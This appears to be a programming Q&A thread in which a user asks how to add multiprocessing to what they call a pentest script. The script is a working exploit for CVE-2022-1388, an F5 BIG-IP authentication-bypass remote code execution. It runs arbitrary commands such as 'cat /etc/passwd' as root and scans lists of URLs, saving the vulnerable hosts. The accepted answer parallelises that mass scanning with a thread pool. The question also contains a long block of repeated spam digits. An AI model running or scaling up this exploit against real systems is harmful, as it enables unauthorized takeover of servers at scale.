# How to add multiprocessing into my script

Tags: python, multithreading, multiprocessing

I wrote a pentest script? but dont know how to add multiprocessing there, can smb hrlp me?

```
#!/usr/bin/env python3
# -*- encoding: utf-8 -*-
def usage():
    print("Eg: \n    python3 CVE-2022-1388.py -u https://127.0.0.1")
    print("    python3 CVE-2022-1388.py -u httts://127.0.0.1 -c 'cat /etc/passwd'")
    print("    python3 CVE-2022-1388.py -f urls.txt")
    
def poc(target):
    url = requests.utils.urlparse(target).scheme + "://" + requests.utils.urlparse(target).netloc
    payload = {"command": "run", "utilCmdArgs": "-c id"}
    try:
        res = requests.post(url+endpoint, headers=headers, json=payload, proxies=None, timeout=15, verify=False)
        if (res.status_code == 200) and ('uid=0(root) gid=0(root) groups=0(root)' in res.text):
            print("[+] {} is vulnerable!!!".format(url))
            return True
        else:
            print("[-] {} is not vulnerable.".format(url))
            return False
    except Exception as e:
        print("[-] {} Exception: ".format(url) + e)
        pass
    
def exp(target, command):
    url = requests.utils.urlparse(target).scheme + "://" + requests.utils.urlparse(target).netloc
    payload = {"command": "run", "utilCmdArgs": "-c '{}'".format(command)}
    try:
        res = requests.post(url+endpoint, headers=headers, json=payload, proxies=None, timeout=15, verify=False)
        if (res.status_code == 200) and ("tm:util:bash:runstate" in res.text):
            print(res.json()['commandResult'])
            return True
        else:
            print("[-] {} is not vulnerable.".format(url))
            return False
    except Exception as e:
        print("[-] {} Exception: ".format(url) + e)
        pass

if __name__ == '__main__':
    parser = argparse.ArgumentParser(
        description="CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE")
    parser.add_argument('-u', '--url', type=str,
                        help="vulnerability verification for individual websites")
    parser.add_argument('-c', '--command', type=str,
                        help="command execution")
    parser.add_argument('-f', '--file', type=str,
                        help="perform vulnerability checks on multiple websites in a file, and the vulnerable websites will be output to the success.txt file")
    args = parser.parse_args()
    if len(sys.argv) == 3:
        if sys.argv[1] in ['-u', '--url']:
            poc(args.url)
        elif sys.argv[1] in ['-f', '--file']:
            if os.path.isfile(args.file) == True:
                with open(args.file) as target:
                    urls = []
                    urls = target.read().splitlines()
                    for url in urls:
                        if poc(url) == True:
                            with open("success.txt", "a+") as f:
                                f.write(url + "\n")
    elif len(sys.argv) == 5:
        if set([sys.argv[1], sys.argv[3]]) < set(['-u', '--url', '-c', '--command']):
            exp(args.url, args.command)
    else:
        parser.print_help()
        usage()
```

I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333

Comment: Hi. Can you please add more information on what the code is doing? Also, what is the large text after the code? Is that relevant? You can describe the different stages of the code and which part you are looking to parallelize. Did you look into this? https://docs.python.org/3/library/multiprocessing.html

Comment: They said that i cant paste too much cod, sorry for spam, i tried do multiprocessing, add smth like pool

Comment: You can describe in the question the methods you tried for multiprocessing, the issues you faced, and also about what you are doing in the code.

Comment: pentest tool? this code check site for vuln

Comment: proc_1 = Process(target=poc, args(target)
proc_2 = Process(target=exp, args(target, command)
proc_3 = Process(target=poc, args(target)
proc_4 = Process(target=exp, args(target, command)
proc_1.start()
proc_2.start()
proc_3.start()
proc_4.start()
proc_1.join()
proc_2.join()
proc_3.join()
proc_4.join()

Comment: i tried this way

Comment: You should update your question with what you tried properly formatted. What you posted in the comment is not valid Python. You mean: `proc_1 = Process(target=poc, args=(target,))`

Answer (score 0):

It appears that you are doing network requests and writing to a file. For this multithreading should be suitable. You need the following import:

```py
from multiprocessing.dummy import Pool
```

If you wish to use multiprocessing instead, then:

```py
from multiprocessing import Pool
```

It would appear that the only place where you have multiple jobs to run is for the *--file* option:

```py
    ... # Previous lines omitted
    if len(sys.argv) == 3:
        if sys.argv[1] in ['-u', '--url']:
            poc(args.url)
        elif sys.argv[1] in ['-f', '--file']:
            if os.path.isfile(args.file) == True:
                with open(args.file) as target:
                    ######## Start of Modified Code ###########
                    """
                    urls = [] # This is unnecessary
                    """
                    urls = target.read().splitlines()
                    pool = Pool(len(urls))
                    # Open file just once. Use flag "a" if you
                    # really want to append to an existing file:
                    with open("success.txt", "w") as f:
                        for idx, result in enumerate(pool.imap(poc, urls)):
                            if result:
                                f.write(urls[idx] + "\n")
                    ######## End of Modified Code ###########
    elif len(sys.argv) == 5:
        if set([sys.argv[1], sys.argv[3]]) < set(['-u', '--url', '-c', '--command']):
            exp(args.url, args.command)
    else:
        parser.print_help()
        usage()
```